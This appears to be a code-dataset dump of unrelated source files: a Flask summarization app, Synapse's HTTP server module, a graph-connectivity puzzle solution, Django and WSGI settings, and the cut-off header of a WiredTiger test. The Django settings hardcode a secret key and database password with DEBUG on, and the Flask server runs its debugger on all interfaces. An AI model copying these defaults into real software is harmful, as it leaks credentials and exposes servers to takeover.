silenceliang/CascadingAgentsHybridSum
|
6c127df51bd8cc926878f62ebdb66bc1042bb58c
|
[
"MIT"
] | null | null | null |
from flask import render_template, request
from flask_script import Manager, Server
from app import app
from model import Content, Summary, Article
import app.static.summ as summarizationModel
import os, json, logging
@app.route('/', endpoint='ACCESS')
@app.route('/index.html', endpoint='ACCESSFILE')
def index():
try:
all_pairs = Article.objects.all()
return render_template('index.html', history=all_pairs)
except Exception as e:
logging.error(e)
raise e
@app.route('/run_decode', methods=['POST'])
def run_decode():
logging.debug('decode your input by our pretrained model')
try:
source = request.get_json()['source'] # GET request with String from frontend directly
logging.debug('input: {}'.format(source)) # GET String-type context from the backend
try:
logging.debug('using the pretrained model.')
sentNums, summary = summarizationModel.decode.run_(source)
except Exception as e:
logging.error(e)
else:
logging.debug('The number of sentences is {}'.format(sentNums))
logging.debug('The abstract is that {}'.format(summary))
results = {'sent_no': sentNums, 'final': summary}
try:
article = Content(text=source)
abstract = Summary(text=summary)
pair = Article(article=article.id, abstract=abstract.id)
article.save()
abstract.save()
pair.save()
except Exception as e:
logging.error(e)
return json.dumps(results)
except:
message = {'message' : 'Fail to catch the data from client.'}
return json.dumps(message)
manager = Manager(app)
manager.add_command('runserver', Server(
use_debugger = True,
use_reloader = True,
host = os.getenv('IP', '0.0.0.0'),
port = int(os.getenv('PORT', 5001))
))
if __name__ == "__main__":
manager.run()
| 32.311475
| 94
| 0.624049
|
from flask import render_template, request
from flask_script import Manager, Server
from app import app
from model import Content, Summary, Article
import app.static.summ as summarizationModel
import os, json, logging
@app.route('/', endpoint='ACCESS')
@app.route('/index.html', endpoint='ACCESSFILE')
def index():
try:
all_pairs = Article.objects.all()
return render_template('index.html', history=all_pairs)
except Exception as e:
logging.error(e)
raise e
@app.route('/run_decode', methods=['POST'])
def run_decode():
logging.debug('decode your input by our pretrained model')
try:
source = request.get_json()['source']
logging.debug('input: {}'.format(source))
try:
logging.debug('using the pretrained model.')
sentNums, summary = summarizationModel.decode.run_(source)
except Exception as e:
logging.error(e)
else:
logging.debug('The number of sentences is {}'.format(sentNums))
logging.debug('The abstract is that {}'.format(summary))
results = {'sent_no': sentNums, 'final': summary}
try:
article = Content(text=source)
abstract = Summary(text=summary)
pair = Article(article=article.id, abstract=abstract.id)
article.save()
abstract.save()
pair.save()
except Exception as e:
logging.error(e)
return json.dumps(results)
except:
message = {'message' : 'Fail to catch the data from client.'}
return json.dumps(message)
manager = Manager(app)
manager.add_command('runserver', Server(
use_debugger = True,
use_reloader = True,
host = os.getenv('IP', '0.0.0.0'),
port = int(os.getenv('PORT', 5001))
))
if __name__ == "__main__":
manager.run()
| true
| true
|
f705abab94d05422bd97d62349625cd2fa0906e4
| 15,678
|
py
|
Python
|
synapse/http/server.py
|
theworldbright/synapse
|
6783534a0f9f34d6972a31af368ee2324e2033f3
|
[
"Apache-2.0"
] | null | null | null |
synapse/http/server.py
|
theworldbright/synapse
|
6783534a0f9f34d6972a31af368ee2324e2033f3
|
[
"Apache-2.0"
] | null | null | null |
synapse/http/server.py
|
theworldbright/synapse
|
6783534a0f9f34d6972a31af368ee2324e2033f3
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from synapse.api.errors import (
cs_exception, SynapseError, CodeMessageException, UnrecognizedRequestError, Codes
)
from synapse.util.logcontext import LoggingContext, PreserveLoggingContext
from synapse.util.caches import intern_dict
import synapse.metrics
import synapse.events
from canonicaljson import (
encode_canonical_json, encode_pretty_printed_json
)
from twisted.internet import defer
from twisted.web import server, resource
from twisted.web.server import NOT_DONE_YET
from twisted.web.util import redirectTo
import collections
import logging
import urllib
import ujson
logger = logging.getLogger(__name__)
metrics = synapse.metrics.get_metrics_for(__name__)
incoming_requests_counter = metrics.register_counter(
"requests",
labels=["method", "servlet", "tag"],
)
outgoing_responses_counter = metrics.register_counter(
"responses",
labels=["method", "code"],
)
response_timer = metrics.register_distribution(
"response_time",
labels=["method", "servlet", "tag"]
)
response_ru_utime = metrics.register_distribution(
"response_ru_utime", labels=["method", "servlet", "tag"]
)
response_ru_stime = metrics.register_distribution(
"response_ru_stime", labels=["method", "servlet", "tag"]
)
response_db_txn_count = metrics.register_distribution(
"response_db_txn_count", labels=["method", "servlet", "tag"]
)
response_db_txn_duration = metrics.register_distribution(
"response_db_txn_duration", labels=["method", "servlet", "tag"]
)
_next_request_id = 0
def request_handler(report_metrics=True):
"""Decorator for ``wrap_request_handler``"""
return lambda request_handler: wrap_request_handler(request_handler, report_metrics)
def wrap_request_handler(request_handler, report_metrics):
"""Wraps a method that acts as a request handler with the necessary logging
and exception handling.
The method must have a signature of "handle_foo(self, request)". The
argument "self" must have "version_string" and "clock" attributes. The
argument "request" must be a twisted HTTP request.
The method must return a deferred. If the deferred succeeds we assume that
a response has been sent. If the deferred fails with a SynapseError we use
it to send a JSON response with the appropriate HTTP reponse code. If the
deferred fails with any other type of error we send a 500 reponse.
We insert a unique request-id into the logging context for this request and
log the response and duration for this request.
"""
@defer.inlineCallbacks
def wrapped_request_handler(self, request):
global _next_request_id
request_id = "%s-%s" % (request.method, _next_request_id)
_next_request_id += 1
with LoggingContext(request_id) as request_context:
if report_metrics:
request_metrics = RequestMetrics()
request_metrics.start(self.clock)
request_context.request = request_id
with request.processing():
try:
with PreserveLoggingContext(request_context):
yield request_handler(self, request)
except CodeMessageException as e:
code = e.code
if isinstance(e, SynapseError):
logger.info(
"%s SynapseError: %s - %s", request, code, e.msg
)
else:
logger.exception(e)
outgoing_responses_counter.inc(request.method, str(code))
respond_with_json(
request, code, cs_exception(e), send_cors=True,
pretty_print=_request_user_agent_is_curl(request),
version_string=self.version_string,
)
except:
logger.exception(
"Failed handle request %s.%s on %r: %r",
request_handler.__module__,
request_handler.__name__,
self,
request
)
respond_with_json(
request,
500,
{
"error": "Internal server error",
"errcode": Codes.UNKNOWN,
},
send_cors=True
)
finally:
try:
if report_metrics:
request_metrics.stop(
self.clock, request, self.__class__.__name__
)
except:
pass
return wrapped_request_handler
class HttpServer(object):
""" Interface for registering callbacks on a HTTP server
"""
def register_paths(self, method, path_patterns, callback):
""" Register a callback that gets fired if we receive a http request
with the given method for a path that matches the given regex.
If the regex contains groups these gets passed to the calback via
an unpacked tuple.
Args:
method (str): The method to listen to.
path_patterns (list<SRE_Pattern>): The regex used to match requests.
callback (function): The function to fire if we receive a matched
request. The first argument will be the request object and
subsequent arguments will be any matched groups from the regex.
This should return a tuple of (code, response).
"""
pass
class JsonResource(HttpServer, resource.Resource):
""" This implements the HttpServer interface and provides JSON support for
Resources.
Register callbacks via register_path()
Callbacks can return a tuple of status code and a dict in which case the
the dict will automatically be sent to the client as a JSON object.
The JsonResource is primarily intended for returning JSON, but callbacks
may send something other than JSON, they may do so by using the methods
on the request object and instead returning None.
"""
isLeaf = True
_PathEntry = collections.namedtuple("_PathEntry", ["pattern", "callback"])
def __init__(self, hs, canonical_json=True):
resource.Resource.__init__(self)
self.canonical_json = canonical_json
self.clock = hs.get_clock()
self.path_regexs = {}
self.version_string = hs.version_string
self.hs = hs
def register_paths(self, method, path_patterns, callback):
for path_pattern in path_patterns:
self.path_regexs.setdefault(method, []).append(
self._PathEntry(path_pattern, callback)
)
def render(self, request):
""" This gets called by twisted every time someone sends us a request.
"""
self._async_render(request)
return server.NOT_DONE_YET
# Disable metric reporting because _async_render does its own metrics.
# It does its own metric reporting because _async_render dispatches to
# a callback and it's the class name of that callback we want to report
# against rather than the JsonResource itself.
@request_handler(report_metrics=False)
@defer.inlineCallbacks
def _async_render(self, request):
""" This gets called from render() every time someone sends us a request.
This checks if anyone has registered a callback for that method and
path.
"""
if request.method == "OPTIONS":
self._send_response(request, 200, {})
return
request_metrics = RequestMetrics()
request_metrics.start(self.clock)
# Loop through all the registered callbacks to check if the method
# and path regex match
for path_entry in self.path_regexs.get(request.method, []):
m = path_entry.pattern.match(request.path)
if not m:
continue
# We found a match! Trigger callback and then return the
# returned response. We pass both the request and any
# matched groups from the regex to the callback.
callback = path_entry.callback
servlet_instance = getattr(callback, "__self__", None)
if servlet_instance is not None:
servlet_classname = servlet_instance.__class__.__name__
else:
servlet_classname = "%r" % callback
kwargs = intern_dict({
name: urllib.unquote(value).decode("UTF-8") if value else value
for name, value in m.groupdict().items()
})
callback_return = yield callback(request, **kwargs)
if callback_return is not None:
code, response = callback_return
self._send_response(request, code, response)
try:
request_metrics.stop(self.clock, request, servlet_classname)
except:
pass
return
# Huh. No one wanted to handle that? Fiiiiiine. Send 400.
raise UnrecognizedRequestError()
def _send_response(self, request, code, response_json_object,
response_code_message=None):
# could alternatively use request.notifyFinish() and flip a flag when
# the Deferred fires, but since the flag is RIGHT THERE it seems like
# a waste.
if request._disconnected:
logger.warn(
"Not sending response to request %s, already disconnected.",
request)
return
outgoing_responses_counter.inc(request.method, str(code))
# TODO: Only enable CORS for the requests that need it.
respond_with_json(
request, code, response_json_object,
send_cors=True,
response_code_message=response_code_message,
pretty_print=_request_user_agent_is_curl(request),
version_string=self.version_string,
canonical_json=self.canonical_json,
)
class RequestMetrics(object):
def start(self, clock):
self.start = clock.time_msec()
self.start_context = LoggingContext.current_context()
def stop(self, clock, request, servlet_classname):
context = LoggingContext.current_context()
tag = ""
if context:
tag = context.tag
if context != self.start_context:
logger.warn(
"Context have unexpectedly changed %r, %r",
context, self.start_context
)
return
incoming_requests_counter.inc(request.method, servlet_classname, tag)
response_timer.inc_by(
clock.time_msec() - self.start, request.method,
servlet_classname, tag
)
ru_utime, ru_stime = context.get_resource_usage()
response_ru_utime.inc_by(
ru_utime, request.method, servlet_classname, tag
)
response_ru_stime.inc_by(
ru_stime, request.method, servlet_classname, tag
)
response_db_txn_count.inc_by(
context.db_txn_count, request.method, servlet_classname, tag
)
response_db_txn_duration.inc_by(
context.db_txn_duration, request.method, servlet_classname, tag
)
class RootRedirect(resource.Resource):
"""Redirects the root '/' path to another path."""
def __init__(self, path):
resource.Resource.__init__(self)
self.url = path
def render_GET(self, request):
return redirectTo(self.url, request)
def getChild(self, name, request):
if len(name) == 0:
return self # select ourselves as the child to render
return resource.Resource.getChild(self, name, request)
def respond_with_json(request, code, json_object, send_cors=False,
response_code_message=None, pretty_print=False,
version_string="", canonical_json=True):
if pretty_print:
json_bytes = encode_pretty_printed_json(json_object) + "\n"
else:
if canonical_json or synapse.events.USE_FROZEN_DICTS:
json_bytes = encode_canonical_json(json_object)
else:
# ujson doesn't like frozen_dicts.
json_bytes = ujson.dumps(json_object, ensure_ascii=False)
return respond_with_json_bytes(
request, code, json_bytes,
send_cors=send_cors,
response_code_message=response_code_message,
version_string=version_string
)
def respond_with_json_bytes(request, code, json_bytes, send_cors=False,
version_string="", response_code_message=None):
"""Sends encoded JSON in response to the given request.
Args:
request (twisted.web.http.Request): The http request to respond to.
code (int): The HTTP response code.
json_bytes (bytes): The json bytes to use as the response body.
send_cors (bool): Whether to send Cross-Origin Resource Sharing headers
http://www.w3.org/TR/cors/
Returns:
twisted.web.server.NOT_DONE_YET"""
request.setResponseCode(code, message=response_code_message)
request.setHeader(b"Content-Type", b"application/json")
request.setHeader(b"Server", version_string)
request.setHeader(b"Content-Length", b"%d" % (len(json_bytes),))
if send_cors:
request.setHeader("Access-Control-Allow-Origin", "*")
request.setHeader("Access-Control-Allow-Methods",
"GET, POST, PUT, DELETE, OPTIONS")
request.setHeader("Access-Control-Allow-Headers",
"Origin, X-Requested-With, Content-Type, Accept")
request.write(json_bytes)
finish_request(request)
return NOT_DONE_YET
def finish_request(request):
""" Finish writing the response to the request.
Twisted throws a RuntimeException if the connection closed before the
response was written but doesn't provide a convenient or reliable way to
determine if the connection was closed. So we catch and log the RuntimeException
You might think that ``request.notifyFinish`` could be used to tell if the
request was finished. However the deferred it returns won't fire if the
connection was already closed, meaning we'd have to have called the method
right at the start of the request. By the time we want to write the response
it will already be too late.
"""
try:
request.finish()
except RuntimeError as e:
logger.info("Connection disconnected before response was written: %r", e)
def _request_user_agent_is_curl(request):
user_agents = request.requestHeaders.getRawHeaders(
"User-Agent", default=[]
)
for user_agent in user_agents:
if "curl" in user_agent:
return True
return False
| 36.124424
| 88
| 0.637518
|
from synapse.api.errors import (
cs_exception, SynapseError, CodeMessageException, UnrecognizedRequestError, Codes
)
from synapse.util.logcontext import LoggingContext, PreserveLoggingContext
from synapse.util.caches import intern_dict
import synapse.metrics
import synapse.events
from canonicaljson import (
encode_canonical_json, encode_pretty_printed_json
)
from twisted.internet import defer
from twisted.web import server, resource
from twisted.web.server import NOT_DONE_YET
from twisted.web.util import redirectTo
import collections
import logging
import urllib
import ujson
logger = logging.getLogger(__name__)
metrics = synapse.metrics.get_metrics_for(__name__)
incoming_requests_counter = metrics.register_counter(
"requests",
labels=["method", "servlet", "tag"],
)
outgoing_responses_counter = metrics.register_counter(
"responses",
labels=["method", "code"],
)
response_timer = metrics.register_distribution(
"response_time",
labels=["method", "servlet", "tag"]
)
response_ru_utime = metrics.register_distribution(
"response_ru_utime", labels=["method", "servlet", "tag"]
)
response_ru_stime = metrics.register_distribution(
"response_ru_stime", labels=["method", "servlet", "tag"]
)
response_db_txn_count = metrics.register_distribution(
"response_db_txn_count", labels=["method", "servlet", "tag"]
)
response_db_txn_duration = metrics.register_distribution(
"response_db_txn_duration", labels=["method", "servlet", "tag"]
)
_next_request_id = 0
def request_handler(report_metrics=True):
return lambda request_handler: wrap_request_handler(request_handler, report_metrics)
def wrap_request_handler(request_handler, report_metrics):
@defer.inlineCallbacks
def wrapped_request_handler(self, request):
global _next_request_id
request_id = "%s-%s" % (request.method, _next_request_id)
_next_request_id += 1
with LoggingContext(request_id) as request_context:
if report_metrics:
request_metrics = RequestMetrics()
request_metrics.start(self.clock)
request_context.request = request_id
with request.processing():
try:
with PreserveLoggingContext(request_context):
yield request_handler(self, request)
except CodeMessageException as e:
code = e.code
if isinstance(e, SynapseError):
logger.info(
"%s SynapseError: %s - %s", request, code, e.msg
)
else:
logger.exception(e)
outgoing_responses_counter.inc(request.method, str(code))
respond_with_json(
request, code, cs_exception(e), send_cors=True,
pretty_print=_request_user_agent_is_curl(request),
version_string=self.version_string,
)
except:
logger.exception(
"Failed handle request %s.%s on %r: %r",
request_handler.__module__,
request_handler.__name__,
self,
request
)
respond_with_json(
request,
500,
{
"error": "Internal server error",
"errcode": Codes.UNKNOWN,
},
send_cors=True
)
finally:
try:
if report_metrics:
request_metrics.stop(
self.clock, request, self.__class__.__name__
)
except:
pass
return wrapped_request_handler
class HttpServer(object):
def register_paths(self, method, path_patterns, callback):
pass
class JsonResource(HttpServer, resource.Resource):
isLeaf = True
_PathEntry = collections.namedtuple("_PathEntry", ["pattern", "callback"])
def __init__(self, hs, canonical_json=True):
resource.Resource.__init__(self)
self.canonical_json = canonical_json
self.clock = hs.get_clock()
self.path_regexs = {}
self.version_string = hs.version_string
self.hs = hs
def register_paths(self, method, path_patterns, callback):
for path_pattern in path_patterns:
self.path_regexs.setdefault(method, []).append(
self._PathEntry(path_pattern, callback)
)
def render(self, request):
self._async_render(request)
return server.NOT_DONE_YET
# against rather than the JsonResource itself.
@request_handler(report_metrics=False)
@defer.inlineCallbacks
def _async_render(self, request):
if request.method == "OPTIONS":
self._send_response(request, 200, {})
return
request_metrics = RequestMetrics()
request_metrics.start(self.clock)
# Loop through all the registered callbacks to check if the method
# and path regex match
for path_entry in self.path_regexs.get(request.method, []):
m = path_entry.pattern.match(request.path)
if not m:
continue
# We found a match! Trigger callback and then return the
# returned response. We pass both the request and any
# matched groups from the regex to the callback.
callback = path_entry.callback
servlet_instance = getattr(callback, "__self__", None)
if servlet_instance is not None:
servlet_classname = servlet_instance.__class__.__name__
else:
servlet_classname = "%r" % callback
kwargs = intern_dict({
name: urllib.unquote(value).decode("UTF-8") if value else value
for name, value in m.groupdict().items()
})
callback_return = yield callback(request, **kwargs)
if callback_return is not None:
code, response = callback_return
self._send_response(request, code, response)
try:
request_metrics.stop(self.clock, request, servlet_classname)
except:
pass
return
# Huh. No one wanted to handle that? Fiiiiiine. Send 400.
raise UnrecognizedRequestError()
def _send_response(self, request, code, response_json_object,
response_code_message=None):
# could alternatively use request.notifyFinish() and flip a flag when
# the Deferred fires, but since the flag is RIGHT THERE it seems like
# a waste.
if request._disconnected:
logger.warn(
"Not sending response to request %s, already disconnected.",
request)
return
outgoing_responses_counter.inc(request.method, str(code))
# TODO: Only enable CORS for the requests that need it.
respond_with_json(
request, code, response_json_object,
send_cors=True,
response_code_message=response_code_message,
pretty_print=_request_user_agent_is_curl(request),
version_string=self.version_string,
canonical_json=self.canonical_json,
)
class RequestMetrics(object):
def start(self, clock):
self.start = clock.time_msec()
self.start_context = LoggingContext.current_context()
def stop(self, clock, request, servlet_classname):
context = LoggingContext.current_context()
tag = ""
if context:
tag = context.tag
if context != self.start_context:
logger.warn(
"Context have unexpectedly changed %r, %r",
context, self.start_context
)
return
incoming_requests_counter.inc(request.method, servlet_classname, tag)
response_timer.inc_by(
clock.time_msec() - self.start, request.method,
servlet_classname, tag
)
ru_utime, ru_stime = context.get_resource_usage()
response_ru_utime.inc_by(
ru_utime, request.method, servlet_classname, tag
)
response_ru_stime.inc_by(
ru_stime, request.method, servlet_classname, tag
)
response_db_txn_count.inc_by(
context.db_txn_count, request.method, servlet_classname, tag
)
response_db_txn_duration.inc_by(
context.db_txn_duration, request.method, servlet_classname, tag
)
class RootRedirect(resource.Resource):
def __init__(self, path):
resource.Resource.__init__(self)
self.url = path
def render_GET(self, request):
return redirectTo(self.url, request)
def getChild(self, name, request):
if len(name) == 0:
return self # select ourselves as the child to render
return resource.Resource.getChild(self, name, request)
def respond_with_json(request, code, json_object, send_cors=False,
response_code_message=None, pretty_print=False,
version_string="", canonical_json=True):
if pretty_print:
json_bytes = encode_pretty_printed_json(json_object) + "\n"
else:
if canonical_json or synapse.events.USE_FROZEN_DICTS:
json_bytes = encode_canonical_json(json_object)
else:
# ujson doesn't like frozen_dicts.
json_bytes = ujson.dumps(json_object, ensure_ascii=False)
return respond_with_json_bytes(
request, code, json_bytes,
send_cors=send_cors,
response_code_message=response_code_message,
version_string=version_string
)
def respond_with_json_bytes(request, code, json_bytes, send_cors=False,
version_string="", response_code_message=None):
request.setResponseCode(code, message=response_code_message)
request.setHeader(b"Content-Type", b"application/json")
request.setHeader(b"Server", version_string)
request.setHeader(b"Content-Length", b"%d" % (len(json_bytes),))
if send_cors:
request.setHeader("Access-Control-Allow-Origin", "*")
request.setHeader("Access-Control-Allow-Methods",
"GET, POST, PUT, DELETE, OPTIONS")
request.setHeader("Access-Control-Allow-Headers",
"Origin, X-Requested-With, Content-Type, Accept")
request.write(json_bytes)
finish_request(request)
return NOT_DONE_YET
def finish_request(request):
try:
request.finish()
except RuntimeError as e:
logger.info("Connection disconnected before response was written: %r", e)
def _request_user_agent_is_curl(request):
user_agents = request.requestHeaders.getRawHeaders(
"User-Agent", default=[]
)
for user_agent in user_agents:
if "curl" in user_agent:
return True
return False
| true
| true
|
f705ae64cdecffa5cafbe9b36e37245e035fb0b5
| 1,380
|
py
|
Python
|
hackerearth/Algorithms/Feasible relations/solution.py
|
ATrain951/01.python-com_Qproject
|
c164dd093954d006538020bdf2e59e716b24d67c
|
[
"MIT"
] | 4
|
2020-07-24T01:59:50.000Z
|
2021-07-24T15:14:08.000Z
|
hackerearth/Algorithms/Feasible relations/solution.py
|
ATrain951/01.python-com_Qproject
|
c164dd093954d006538020bdf2e59e716b24d67c
|
[
"MIT"
] | null | null | null |
hackerearth/Algorithms/Feasible relations/solution.py
|
ATrain951/01.python-com_Qproject
|
c164dd093954d006538020bdf2e59e716b24d67c
|
[
"MIT"
] | null | null | null |
"""
# Sample code to perform I/O:
name = input() # Reading input from STDIN
print('Hi, %s.' % name) # Writing output to STDOUT
# Warning: Printing unwanted or ill-formatted data to output will cause the test cases to fail
"""
# Write your code here
from collections import deque, defaultdict
from sys import stdin
def check_connected(x, connected, adjacency):
stack = deque([x])
while stack:
u = stack.pop()
for v in adjacency[u]:
if v not in connected:
connected[v] = x
stack.append(v)
t = int(stdin.readline())
for _ in range(t):
n, k = map(int, stdin.readline().strip().split())
equalities = defaultdict(set)
inequalities = []
for _ in range(k):
x1, r, x2 = stdin.readline().strip().split()
x1 = int(x1)
x2 = int(x2)
if r == '=':
equalities[x1].add(x2)
equalities[x2].add(x1)
else:
inequalities.append((x1, x2))
connected_components = {}
for i in range(1, n + 1):
if i not in connected_components:
connected_components[i] = i
check_connected(i, connected_components, equalities)
for x1, x2 in inequalities:
if connected_components[x1] == connected_components[x2]:
print('NO')
break
else:
print('YES')
| 27.6
| 94
| 0.571739
|
from collections import deque, defaultdict
from sys import stdin
def check_connected(x, connected, adjacency):
stack = deque([x])
while stack:
u = stack.pop()
for v in adjacency[u]:
if v not in connected:
connected[v] = x
stack.append(v)
t = int(stdin.readline())
for _ in range(t):
n, k = map(int, stdin.readline().strip().split())
equalities = defaultdict(set)
inequalities = []
for _ in range(k):
x1, r, x2 = stdin.readline().strip().split()
x1 = int(x1)
x2 = int(x2)
if r == '=':
equalities[x1].add(x2)
equalities[x2].add(x1)
else:
inequalities.append((x1, x2))
connected_components = {}
for i in range(1, n + 1):
if i not in connected_components:
connected_components[i] = i
check_connected(i, connected_components, equalities)
for x1, x2 in inequalities:
if connected_components[x1] == connected_components[x2]:
print('NO')
break
else:
print('YES')
| true
| true
|
f705ae9c256c532814c09ac996b19cab9acfb4e3
| 2,527
|
py
|
Python
|
old/apply/apply/settings.py
|
neonsoftware/yard
|
5f2fda72c7a3f330d2442002687ff4d1dfb21680
|
[
"MIT"
] | 1
|
2015-03-11T07:43:09.000Z
|
2015-03-11T07:43:09.000Z
|
old/apply/apply/settings.py
|
neonsoftware/yard
|
5f2fda72c7a3f330d2442002687ff4d1dfb21680
|
[
"MIT"
] | 5
|
2015-05-17T18:22:29.000Z
|
2015-08-15T17:27:03.000Z
|
old/apply/apply/settings.py
|
neonsoftware/yard
|
5f2fda72c7a3f330d2442002687ff4d1dfb21680
|
[
"MIT"
] | null | null | null |
"""
Django settings for apply project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '--v$_^*0r5(ok1^2sxdm4w_wwskvuv-z0tcop+yf1-m@+7p#5i'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'gunicorn',
'bootstrapform',
'yard',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'apply.urls'
WSGI_APPLICATION = 'apply.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'yard', # Or path to database file if using sqlite3.
'USER': 'frankie', # Not used with sqlite3.
'PASSWORD': 'frankie', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
DOCS_URL = BASE_DIR + '/yard/static/docs/'
LOGGING = {
'version': 1,
}
LOGIN_REDIRECT_URL="/"
| 25.019802
| 103
| 0.688564
|
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
SECRET_KEY = '--v$_^*0r5(ok1^2sxdm4w_wwskvuv-z0tcop+yf1-m@+7p#5i'
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'gunicorn',
'bootstrapform',
'yard',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'apply.urls'
WSGI_APPLICATION = 'apply.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'yard', # Or path to database file if using sqlite3.
'USER': 'frankie', # Not used with sqlite3.
'PASSWORD': 'frankie', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
DOCS_URL = BASE_DIR + '/yard/static/docs/'
LOGGING = {
'version': 1,
}
LOGIN_REDIRECT_URL="/"
| true
| true
|
f705af023850008c9327aaee200ad9ea7dc63b24
| 405
|
py
|
Python
|
config/wsgi.py
|
bertini36/boatsandjoy-api
|
b22d82eb02947218d924b381160d622ded9e1d98
|
[
"MIT"
] | null | null | null |
config/wsgi.py
|
bertini36/boatsandjoy-api
|
b22d82eb02947218d924b381160d622ded9e1d98
|
[
"MIT"
] | 12
|
2021-04-08T21:18:37.000Z
|
2022-03-12T00:39:39.000Z
|
config/wsgi.py
|
bertini36/boatsandjoy-api
|
b22d82eb02947218d924b381160d622ded9e1d98
|
[
"MIT"
] | null | null | null |
"""
WSGI config for Boats & Joy project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.production')
application = get_wsgi_application()
| 23.823529
| 78
| 0.782716
|
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.production')
application = get_wsgi_application()
| true
| true
|
f705b09b0a46fccb8f3405bc8e17fc8dd4cacc82
| 3,609
|
py
|
Python
|
src/third_party/wiredtiger/test/suite/test_lsm01.py
|
mwhudson/mongo
|
914bbbd26a686e032fdddec964b109ea78c6e6f6
|
[
"Apache-2.0"
] | 14
|
2019-01-11T05:01:29.000Z
|
2021-11-01T00:39:46.000Z
|
src/third_party/wiredtiger/test/suite/test_lsm01.py
|
mwhudson/mongo
|
914bbbd26a686e032fdddec964b109ea78c6e6f6
|
[
"Apache-2.0"
] | 1
|
2022-03-05T02:55:28.000Z
|
2022-03-05T05:28:00.000Z
|
src/third_party/wiredtiger/test/suite/test_lsm01.py
|
mwhudson/mongo
|
914bbbd26a686e032fdddec964b109ea78c6e6f6
|
[
"Apache-2.0"
] | 7
|
2019-02-08T16:28:36.000Z
|
2021-05-08T14:25:47.000Z
|
#!/usr/bin/env python
#
# Public Domain 2014-2016 MongoDB, Inc.
# Public Domain 2008-2014 WiredTiger, Inc.
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
